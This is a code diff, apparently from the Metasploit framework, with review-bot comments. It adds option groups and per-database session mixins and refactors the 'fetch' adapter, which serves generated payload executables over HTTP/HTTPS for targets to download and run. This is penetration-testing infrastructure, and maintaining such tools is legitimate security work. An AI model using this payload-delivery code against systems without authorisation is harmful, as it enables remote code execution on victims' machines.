# @param [Msf::Module] mod The module module
|
||||
# @param [Msf::OptBase] opt the option which has conditions present
|
||||
# @return [String]
|
||||
# @param [String] left_value The left hand side of the condition
|
||||
# @param [String] operator The conditions comparison operator
|
||||
# @param [String] right_value The right hand side of the condition
|
||||
# @return [Boolean]
|
||||
def self.eval_condition(left_value, operator, right_value)
|
||||
case operator.to_sym
|
||||
when :==
|
||||
@@ -16,6 +17,8 @@ module Msf
|
||||
right_value.include?(left_value)
|
||||
when :nin
|
||||
!right_value.include?(left_value)
|
||||
else
|
||||
raise ArgumentError("Operator: #{operator} is invalid")
|
||||
end
|
||||
end
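Review bot: The new `else` branch calls `ArgumentError(...)` as if it were a method, so an unknown operator raises NoMethodError for an undefined method `ArgumentError` rather than the intended ArgumentError, and the message is lost. It should read `raise ArgumentError, "Operator: #{operator} is invalid"`. The opening lines of `eval_condition` are in the preceding hunk.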
|
||||
|
||||
|
||||
@@ -49,6 +49,7 @@ module Msf
|
||||
#
|
||||
def initialize(opts = {})
|
||||
self.sorted = []
|
||||
self.groups = {}
|
||||
|
||||
add_options(opts)
|
||||
end
|
||||
@@ -313,14 +314,33 @@ module Msf
|
||||
result.sort
|
||||
end
|
||||
|
||||
# Adds an option group to the container
|
||||
#
|
||||
# @param option_group [Msf::OptionGroup]
|
||||
def add_group(option_group)
|
||||
groups[option_group.name] = option_group
|
||||
end
|
||||
|
||||
# Removes an option group from the container by name
|
||||
#
|
||||
# @param group_name [String]
|
||||
def remove_group(group_name)
|
||||
groups.delete(group_name)
|
||||
end
|
||||
|
||||
#
|
||||
# The sorted array of options.
|
||||
#
|
||||
attr_reader :sorted
|
||||
|
||||
# @return [Hash<String, Msf::OptionGroup>]
|
||||
attr_reader :groups
|
||||
|
||||
protected
|
||||
|
||||
attr_writer :sorted # :nodoc:
|
||||
|
||||
attr_writer :groups
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
@@ -0,0 +1,32 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Msf
|
||||
class OptionGroup
|
||||
|
||||
# @return [String] Name for the group
|
||||
attr_accessor :name
|
||||
# @return [String] Description to be displayed to the user
|
||||
attr_accessor :description
|
||||
# @return [Array<String>] List of datastore option names
|
||||
attr_accessor :option_names
|
||||
|
||||
# @param name [String] Name for the group
|
||||
# @param description [String] Description to be displayed to the user
|
||||
# @param option_names [Array<String>] List of datastore option names
|
||||
def initialize(name:, description:, option_names: [])
|
||||
self.name = name
|
||||
self.description = description
|
||||
self.option_names = option_names
|
||||
end
|
||||
|
||||
# @param option_name [String] Name of the datastore option to be added to the group
|
||||
def add_option(option_name)
|
||||
@option_names << option_name
|
||||
end
|
||||
|
||||
# @param option_names [Array<String>] List of datastore option names to be added to the group
|
||||
def add_options(option_names)
|
||||
@option_names.concat(option_names)
|
||||
end
|
||||
end
|
||||
end
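Review bot: `initialize` stores the caller's `option_names` array itself, and `add_option`/`add_options` then mutate it in place with `<<` and `concat`. If a caller passes a shared array, such as a constant list of option names, merging into the group would alter that array for every other user of it. Repeated merges would also append the same names again, which would presumably produce duplicate rows when the group is rendered. Copying on the way in with `self.option_names = option_names.dup` and merging with `@option_names |= option_names` avoids both.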
|
||||
@@ -4,50 +4,8 @@
|
||||
|
||||
# A mixin used for providing Modules with post-exploitation options and helper methods
|
||||
#
|
||||
module Msf::OptionalSession
|
||||
include Msf::SessionCompatibility
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(nil, false)
|
||||
]
|
||||
)
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(nil, false)
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::POSTGRESQL_SESSION_TYPE)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::OptString.new('DATABASE', [ false, 'The database to authenticate against', 'postgres']),
|
||||
Msf::OptString.new('USERNAME', [ false, 'The username to authenticate as', 'postgres']),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(nil, false)
|
||||
]
|
||||
)
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless (framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE) || framework.features.enabled?(Msf::FeatureManager::POSTGRESQL_SESSION_TYPE) || framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE))
|
||||
|
||||
super
|
||||
module Msf
|
||||
module OptionalSession
|
||||
include Msf::SessionCompatibility
|
||||
end
|
||||
end
|
||||
|
||||
@@ -0,0 +1,46 @@
|
||||
# frozen_string_literal: true
|
||||
|
||||
module Msf
|
||||
module OptionalSession
|
||||
module MSSQL
|
||||
include Msf::OptionalSession
|
||||
|
||||
RHOST_GROUP_OPTIONS = %w[RHOSTS RPORT DATABASE USERNAME PASSWORD THREADS]
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'SessionTypes' => %w[mssql]
|
||||
)
|
||||
)
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)
|
||||
register_option_group(name: 'SESSION',
|
||||
description: 'Used when connecting via an existing SESSION',
|
||||
option_names: ['SESSION'])
|
||||
register_option_group(name: 'RHOST',
|
||||
description: 'Used when making a new connection via RHOSTS',
|
||||
option_names: RHOST_GROUP_OPTIONS)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::OptString.new('DATABASE', [ false, 'The database to authenticate against', 'MSSQL']),
|
||||
Msf::OptString.new('USERNAME', [ false, 'The username to authenticate as', 'MSSQL']),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(1433, false)
|
||||
]
|
||||
)
|
||||
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless framework.features.enabled?(Msf::FeatureManager::MSSQL_SESSION_TYPE)
|
||||
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
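Review bot: The `DATABASE` and `USERNAME` options are registered with the default `'MSSQL'`, which looks carried over from the PostgreSQL variant, where `'postgres'` names both a stock database and a stock account. As far as I know SQL Server has no database or login of that name out of the box, so a module relying on these defaults would fail to connect until the operator overrides both. Because `register_options` runs after `super`, these entries may also replace a `USERNAME` / `DATABASE` default already registered by the including module; that depends on include order, which is not visible here. Consider dropping the two options from this mixin, as the MySQL and SMB variants do, or adding a comment that states the defaults are placeholders the including module is expected to override.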
@@ -0,0 +1,44 @@
|
||||
# frozen_string_literal: true
|
||||
|
||||
module Msf
|
||||
module OptionalSession
|
||||
module MySQL
|
||||
include Msf::OptionalSession
|
||||
|
||||
RHOST_GROUP_OPTIONS = %w[RHOSTS RPORT DATABASE USERNAME PASSWORD THREADS]
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'SessionTypes' => %w[mysql]
|
||||
)
|
||||
)
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)
|
||||
register_option_group(name: 'SESSION',
|
||||
description: 'Used when connecting via an existing SESSION',
|
||||
option_names: ['SESSION'])
|
||||
register_option_group(name: 'RHOST',
|
||||
description: 'Used when making a new connection via RHOSTS',
|
||||
option_names: RHOST_GROUP_OPTIONS)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(3306, false)
|
||||
]
|
||||
)
|
||||
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)
|
||||
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,46 @@
|
||||
# frozen_string_literal: true
|
||||
|
||||
module Msf
|
||||
module OptionalSession
|
||||
module PostgreSQL
|
||||
include Msf::OptionalSession
|
||||
|
||||
RHOST_GROUP_OPTIONS = %w[RHOSTS RPORT DATABASE USERNAME PASSWORD THREADS]
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'SessionTypes' => %w[postgresql]
|
||||
)
|
||||
)
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::POSTGRESQL_SESSION_TYPE)
|
||||
register_option_group(name: 'SESSION',
|
||||
description: 'Used when connecting via an existing SESSION',
|
||||
option_names: ['SESSION'])
|
||||
register_option_group(name: 'RHOST',
|
||||
description: 'Used when making a new connection via RHOSTS',
|
||||
option_names: RHOST_GROUP_OPTIONS)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::OptString.new('DATABASE', [ false, 'The database to authenticate against', 'postgres']),
|
||||
Msf::OptString.new('USERNAME', [ false, 'The username to authenticate as', 'postgres']),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(5432, false)
|
||||
]
|
||||
)
|
||||
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless framework.features.enabled?(Msf::FeatureManager::POSTGRESQL_SESSION_TYPE)
|
||||
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,44 @@
|
||||
# frozen_string_literal: true
|
||||
|
||||
module Msf
|
||||
module OptionalSession
|
||||
module SMB
|
||||
include Msf::OptionalSession
|
||||
|
||||
RHOST_GROUP_OPTIONS = %w[RHOSTS RPORT SMBDomain SMBUser SMBPass THREADS]
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'SessionTypes' => %w[smb]
|
||||
)
|
||||
)
|
||||
|
||||
if framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
|
||||
register_option_group(name: 'SESSION',
|
||||
description: 'Used when connecting via an existing SESSION',
|
||||
option_names: ['SESSION'])
|
||||
register_option_group(name: 'RHOST',
|
||||
description: 'Used when making a new connection via RHOSTS',
|
||||
option_names: RHOST_GROUP_OPTIONS)
|
||||
register_options(
|
||||
[
|
||||
Msf::OptInt.new('SESSION', [ false, 'The session to run this module on' ]),
|
||||
Msf::Opt::RHOST(nil, false),
|
||||
Msf::Opt::RPORT(445, false)
|
||||
]
|
||||
)
|
||||
|
||||
add_info('New in Metasploit 6.4 - This module can target a %grnSESSION%clr or an %grnRHOST%clr')
|
||||
end
|
||||
end
|
||||
|
||||
def session
|
||||
return nil unless framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
|
||||
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -5,19 +5,19 @@ module Msf::Payload::Adapter::Fetch
|
||||
register_options(
|
||||
[
|
||||
Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
|
||||
Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces.', Rex::Text.rand_text_alpha(rand(8..12))], regex:/^[\S]*$/),
|
||||
Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: /^[^\s\/\\]*$/),
|
||||
Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
|
||||
Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ false, 'Local IP to use for serving payload']),
|
||||
# FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
|
||||
Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
|
||||
Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
|
||||
Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', ''], regex:/^[\S]*$/)
|
||||
Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', ''], regex:/^[\S]*$/)
|
||||
]
|
||||
)
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptAddress.new('FetchListenerBindAddress', [ false, 'The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST']),
|
||||
Msf::OptPort.new('FetchListenerBindPort', [false, 'The port to bind to if different from FETCH_SRVPORT']),
|
||||
Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false]),
|
||||
Msf::OptString.new('FetchServerName', [true, 'Fetch Server Name', 'Apache'])
|
||||
Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false])
|
||||
]
|
||||
)
|
||||
@delete_resource = true
|
||||
@@ -27,7 +27,6 @@ module Msf::Payload::Adapter::Fetch
|
||||
@remote_destination_win = nil
|
||||
@remote_destination_nix = nil
|
||||
@windows = nil
|
||||
|
||||
end
|
||||
|
||||
# If no fetch URL is provided, we generate one based off the underlying payload data
|
||||
@@ -77,9 +76,11 @@ module Msf::Payload::Adapter::Fetch
|
||||
datastore['FetchListenerBindPort'].blank? ? srvport : datastore['FetchListenerBindPort']
|
||||
end
|
||||
|
||||
def fetch_bindnetloc
|
||||
Rex::Socket.to_authority(fetch_bindhost, fetch_bindport)
|
||||
end
|
||||
|
||||
def generate(opts = {})
|
||||
datastore['FETCH_SRVHOST'] = datastore['LHOST'] if datastore['FETCH_SRVHOST'].blank?
|
||||
fail_with(Msf::Module::Failure::BadConfig, 'FETCH_SRVHOST required') if datastore['FETCH_SRVHOST'].blank?
|
||||
opts[:arch] ||= module_info['AdaptedArch']
|
||||
opts[:code] = super
|
||||
@srvexe = generate_payload_exe(opts)
|
||||
@@ -126,17 +127,14 @@ module Msf::Payload::Adapter::Fetch
|
||||
end
|
||||
|
||||
def srvhost
|
||||
datastore['FETCH_SRVHOST']
|
||||
host = datastore['FETCH_SRVHOST']
|
||||
host = datastore['LHOST'] if host.blank?
|
||||
host = '127.127.127.127' if host.blank?
|
||||
host
|
||||
end
|
||||
|
||||
def srvnetloc
|
||||
netloc = srvhost
|
||||
if Rex::Socket.is_ipv6?(netloc)
|
||||
netloc = "[#{netloc}]:#{srvport}"
|
||||
else
|
||||
netloc = "#{netloc}:#{srvport}"
|
||||
end
|
||||
netloc
|
||||
Rex::Socket.to_authority(srvhost, srvport)
|
||||
end
|
||||
|
||||
def srvport
|
||||
@@ -148,10 +146,6 @@ module Msf::Payload::Adapter::Fetch
|
||||
default_srvuri
|
||||
end
|
||||
|
||||
def srvname
|
||||
datastore['FetchServerName']
|
||||
end
|
||||
|
||||
def windows?
|
||||
return @windows unless @windows.nil?
|
||||
@windows = platform.platforms.first == Msf::Module::Platform::Windows
|
||||
@@ -243,7 +237,6 @@ module Msf::Payload::Adapter::Fetch
|
||||
cmd + _execute_add
|
||||
end
|
||||
|
||||
|
||||
def _generate_ftp_command
|
||||
case fetch_protocol
|
||||
when 'FTP'
|
||||
|
||||
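Review bot: The new `FETCH_FILENAME` pattern `/^[^\s\/\\]*$/` in the first hunk is anchored with `^` and `$`, which in Ruby match at line boundaries rather than at the ends of the string, so the check passes as soon as one line of the value is clean. The `FETCH_WRITABLE_DIR` pattern `/^[\S]*$/` in the same hunk and the `FETCH_FILENAME` option added in the new SMB adapter have the same form. Since the description promises "cannot contain spaces or slashes", anchor on the whole string: `regex: /\A[^\s\/\\]*\z/`. Separately, the `'127.127.127.127'` fallback added to `srvhost` has no comment explaining why a placeholder address is returned when `generate` already fails on a blank `FETCH_SRVHOST`.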
@@ -10,7 +10,11 @@ module Msf::Payload::Adapter::Fetch::HTTP
|
||||
end
|
||||
|
||||
def cleanup_handler
|
||||
cleanup_http_fetch_service(@fetch_service, @delete_resource)
|
||||
if @fetch_service
|
||||
cleanup_http_fetch_service(@fetch_service, @delete_resource)
|
||||
@fetch_service = nil
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
@@ -20,4 +24,3 @@ module Msf::Payload::Adapter::Fetch::HTTP
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
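Review bot: In the new `cleanup_handler`, `@fetch_service = nil` runs only if `cleanup_http_fetch_service` returns normally, so an exception during cleanup leaves the stale reference in place and a later cleanup would try to release the same listener again. The same pattern is added to the Https, TFTP and SMB adapters in this changeset. An `ensure` keeps the reset unconditional: `begin; cleanup_http_fetch_service(@fetch_service, @delete_resource); ensure; @fetch_service = nil; end`. The enclosing module starts outside the hunk.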
@@ -10,7 +10,11 @@ module Msf::Payload::Adapter::Fetch::Https
|
||||
end
|
||||
|
||||
def cleanup_handler
|
||||
cleanup_http_fetch_service(@fetch_service, @delete_resource)
|
||||
if @fetch_service
|
||||
cleanup_http_fetch_service(@fetch_service, @delete_resource)
|
||||
@fetch_service = nil
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
@@ -19,4 +23,4 @@ module Msf::Payload::Adapter::Fetch::Https
|
||||
super
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
@@ -1,19 +1,13 @@
|
||||
module Msf::Payload::Adapter::Fetch::Server::HTTP
|
||||
include Msf::Payload::Adapter::Fetch::Server::Https
|
||||
|
||||
# This mixin supports only HTTP fetch handlers but still imports the HTTPS mixin.
|
||||
# We just remove the HTTPS Options so the user does not see them.
|
||||
#
|
||||
# This mixin supports only HTTP fetch handlers.
|
||||
|
||||
def initialize(*args)
|
||||
super
|
||||
deregister_options('FETCH_SSL',
|
||||
'FETCH_CHECK_CERT',
|
||||
'FetchSSLCert',
|
||||
'FetchSSLCompression',
|
||||
'FetchSSLCipher',
|
||||
'FetchSSLCipher',
|
||||
'FetchSSLVersion'
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptString.new('FetchHttpServerName', [true, 'Fetch HTTP server name', 'Apache'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
@@ -21,4 +15,88 @@ module Msf::Payload::Adapter::Fetch::Server::HTTP
|
||||
'HTTP'
|
||||
end
|
||||
|
||||
def srvname
|
||||
datastore['FetchHttpServerName']
|
||||
end
|
||||
|
||||
def add_resource(fetch_service, uri, srvexe)
|
||||
vprint_status("Adding resource #{uri}")
|
||||
if fetch_service.resources.include?(uri)
|
||||
# When we clean up, we need to leave resources alone, because we never added one.
|
||||
@delete_resource = false
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Resource collision detected. Set FETCH_URIPATH to a different value to continue.")
|
||||
end
|
||||
fetch_service.add_resource(uri,
|
||||
'Proc' => proc do |cli, req|
|
||||
on_request_uri(cli, req, srvexe)
|
||||
end,
|
||||
'VirtualDirectory' => true)
|
||||
rescue ::Exception => e
|
||||
# When we clean up, we need to leave resources alone, because we never added one.
|
||||
@delete_resource = false
|
||||
fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n#{e}")
|
||||
end
|
||||
|
||||
def cleanup_http_fetch_service(fetch_service, delete_resource)
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
if fetch_service.resources.include?(escaped_srvuri) && delete_resource
|
||||
fetch_service.remove_resource(escaped_srvuri)
|
||||
end
|
||||
fetch_service.deref
|
||||
end
|
||||
|
||||
def start_http_fetch_handler(srvname, srvexe, ssl=false, ssl_cert=nil, ssl_compression=nil, ssl_cipher=nil, ssl_version=nil)
|
||||
# this looks a bit funny because I converted it to use an instance variable so that if we crash in the
|
||||
# middle and don't return a value, we still have the right fetch_service to clean up.
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
fetch_service = start_http_server(ssl, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
|
||||
if fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{fetch_bindnetloc}")
|
||||
end
|
||||
vprint_status("#{fetch_protocol} server started")
|
||||
fetch_service.server_name = srvname
|
||||
add_resource(fetch_service, escaped_srvuri, srvexe)
|
||||
fetch_service
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request, srvexe)
|
||||
client = cli.peerhost
|
||||
vprint_status("Client #{client} requested #{request.uri}")
|
||||
if (user_agent = request.headers['User-Agent'])
|
||||
client += " (#{user_agent})"
|
||||
end
|
||||
vprint_status("Sending payload to #{client}")
|
||||
cli.send_response(payload_response(srvexe))
|
||||
end
|
||||
|
||||
def payload_response(srvexe)
|
||||
res = Rex::Proto::Http::Response.new(200, 'OK', Rex::Proto::Http::DefaultProtocol)
|
||||
res['Content-Type'] = 'text/html'
|
||||
res.body = srvexe.to_s.unpack('C*').pack('C*')
|
||||
res
|
||||
end
|
||||
|
||||
def start_http_server(ssl=false, ssl_cert=nil, ssl_compression=nil, ssl_cipher=nil, ssl_version=nil)
|
||||
begin
|
||||
fetch_service = Rex::ServiceManager.start(
|
||||
Rex::Proto::Http::Server,
|
||||
fetch_bindport, fetch_bindhost, ssl,
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self
|
||||
},
|
||||
_determine_server_comm(fetch_bindhost),
|
||||
ssl_cert,
|
||||
ssl_compression,
|
||||
ssl_cipher,
|
||||
ssl_version
|
||||
)
|
||||
rescue Exception => e
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{fetch_bindnetloc}\n#{e}")
|
||||
end
|
||||
vprint_status("Fetch handler listening on #{fetch_bindnetloc}")
|
||||
fetch_service
|
||||
end
|
||||
end
|
||||
|
||||
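Review bot: In `add_resource`, the method-level `rescue ::Exception => e` also covers the collision branch above it, so the `BadConfig` failure raised by `fail_with` for "Resource collision detected" (assuming `fail_with` raises, as it does elsewhere in the framework) is caught and reported again as `Failure::Unknown`, hiding the actionable message. `rescue ::Exception`, also used in `start_http_server`, additionally traps interrupts and exit requests. Wrap only the `fetch_service.add_resource(...)` call in `begin ... rescue ::StandardError => e`, and use `rescue ::StandardError => e` in `start_http_server` as well. The comment at the top of `start_http_fetch_handler` still describes an instance variable while the code now holds the service in a local. If the caller assigns `@fetch_service` only from the return value, a failure in `add_resource` leaves the started listener with nothing for `cleanup_handler` to release.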
@@ -1,4 +1,5 @@
|
||||
module Msf::Payload::Adapter::Fetch::Server::Https
|
||||
include Msf::Payload::Adapter::Fetch::Server::HTTP
|
||||
|
||||
# This mixin supports both HTTP and HTTPS fetch handlers. If you only want
|
||||
# HTTP, use the HTTP mixin that imports this, but removes the HTTPS options
|
||||
@@ -6,13 +7,11 @@ module Msf::Payload::Adapter::Fetch::Server::Https
|
||||
super
|
||||
register_options(
|
||||
[
|
||||
Msf::OptBool.new('FETCH_CHECK_CERT', [true,"Check SSL certificate", false])
|
||||
|
||||
Msf::OptBool.new('FETCH_CHECK_CERT', [true, 'Check SSL certificate', false])
|
||||
]
|
||||
)
|
||||
register_advanced_options(
|
||||
[
|
||||
Msf::OptString.new('FetchHttpServerName', [true, 'Http Server Name', 'Apache']),
|
||||
Msf::OptPath.new('FetchSSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)', '']),
|
||||
Msf::OptBool.new('FetchSSLCompression', [ false, 'Enable SSL/TLS-level compression', false ]),
|
||||
Msf::OptString.new('FetchSSLCipher', [ false, 'String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"']),
|
||||
@@ -23,64 +22,10 @@ module Msf::Payload::Adapter::Fetch::Server::Https
|
||||
)
|
||||
end
|
||||
|
||||
def add_resource(fetch_service, uri, srvexe)
|
||||
vprint_status("Adding resource #{uri}")
|
||||
if fetch_service.resources.include?(uri)
|
||||
# When we clean up, we need to leave resources alone, because we never added one.
|
||||
@delete_resource = false
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Resource collision detected. Set FETCH_URI to a different value to continue.")
|
||||
end
|
||||
fetch_service.add_resource(uri,
|
||||
'Proc' => proc do |cli, req|
|
||||
on_request_uri(cli, req, srvexe)
|
||||
end,
|
||||
'VirtualDirectory' => true)
|
||||
rescue ::Exception => e
|
||||
# When we clean up, we need to leave resources alone, because we never added one.
|
||||
@delete_resource = false
|
||||
fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n #{e}")
|
||||
end
|
||||
|
||||
def cleanup_http_fetch_service(fetch_service, delete_resource)
|
||||
unless fetch_service.nil?
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
if fetch_service.resources.include?(escaped_srvuri) && delete_resource
|
||||
fetch_service.remove_resource(escaped_srvuri)
|
||||
end
|
||||
fetch_service.deref
|
||||
if fetch_service.resources.empty?
|
||||
# if we don't call deref, we cannot start another httpserver
|
||||
# this is a reimplementation of the cleanup_service method
|
||||
# in Exploit::Remote::SocketServer
|
||||
temp_service = fetch_service
|
||||
fetch_service = nil
|
||||
temp_service.cleanup
|
||||
temp_service.deref
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def fetch_protocol
|
||||
'HTTPS'
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request, srvexe)
|
||||
client = cli.peerhost
|
||||
vprint_status("Client #{client} requested #{request.uri}")
|
||||
if (user_agent = request.headers['User-Agent'])
|
||||
client += " (#{user_agent})"
|
||||
end
|
||||
vprint_status("Sending payload to #{client}")
|
||||
cli.send_response(payload_response(srvexe))
|
||||
end
|
||||
|
||||
def payload_response(srvexe)
|
||||
res = Rex::Proto::Http::Response.new(200, 'OK', Rex::Proto::Http::DefaultProtocol)
|
||||
res['Content-Type'] = 'text/html'
|
||||
res.body = srvexe.to_s.unpack('C*').pack('C*')
|
||||
res
|
||||
end
|
||||
|
||||
def ssl_cert
|
||||
datastore['FetchSSLCert']
|
||||
end
|
||||
@@ -97,57 +42,7 @@ module Msf::Payload::Adapter::Fetch::Server::Https
|
||||
datastore['FetchSSLVersion']
|
||||
end
|
||||
|
||||
def start_http_fetch_handler(srvname, srvexe)
|
||||
# this looks a bit funny because I converted it to use an instance variable so that if we crash in the
|
||||
# middle and don't return a value, we still have the right fetch_service to clean up.
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
@fetch_service = start_https_server(false, nil, nil, nil, nil) if @fetch_service.nil?
|
||||
if @fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{fetch_bindhost}:#{fetch_bindport}")
|
||||
end
|
||||
vprint_status('HTTP server started')
|
||||
@fetch_service.server_name = srvname
|
||||
add_resource(@fetch_service, escaped_srvuri, srvexe)
|
||||
@fetch_service
|
||||
end
|
||||
|
||||
def start_https_fetch_handler(srvname, srvexe)
|
||||
# this looks a bit funny because I converted it to use an instance variable so that if we crash in the
|
||||
# middle and don't return a value, we still have the right fetch_service to clean up.
|
||||
escaped_srvuri = ('/' + srvuri).gsub('//', '/')
|
||||
@fetch_service = start_https_server(true, ssl_cert, ssl_compression, ssl_cipher, ssl_version) if @fetch_service.nil?
|
||||
if @fetch_service.nil?
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{fetch_bindhost}:#{fetch_bindport}\n #{e}")
|
||||
end
|
||||
vprint_status('HTTPS server started')
|
||||
@fetch_service.server_name = srvname
|
||||
add_resource(@fetch_service, escaped_srvuri, srvexe)
|
||||
@fetch_service
|
||||
start_http_fetch_handler(srvname, srvexe, true, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
|
||||
end
|
||||
|
||||
def start_https_server(ssl, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
|
||||
begin
|
||||
fetch_service = Rex::ServiceManager.start(
|
||||
Rex::Proto::Http::Server,
|
||||
fetch_bindport, fetch_bindhost, ssl,
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self
|
||||
},
|
||||
_determine_server_comm(fetch_bindhost),
|
||||
ssl_cert,
|
||||
ssl_compression,
|
||||
ssl_cipher,
|
||||
ssl_version
|
||||
)
|
||||
rescue Exception => e
|
||||
cleanup_handler
|
||||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{fetch_bindhost}:#{fetch_bindport}\n #{e}")
|
||||
end
|
||||
vprint_status("Fetch Handler listening on #{fetch_bindhost}:#{fetch_bindport}")
|
||||
fetch_service
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
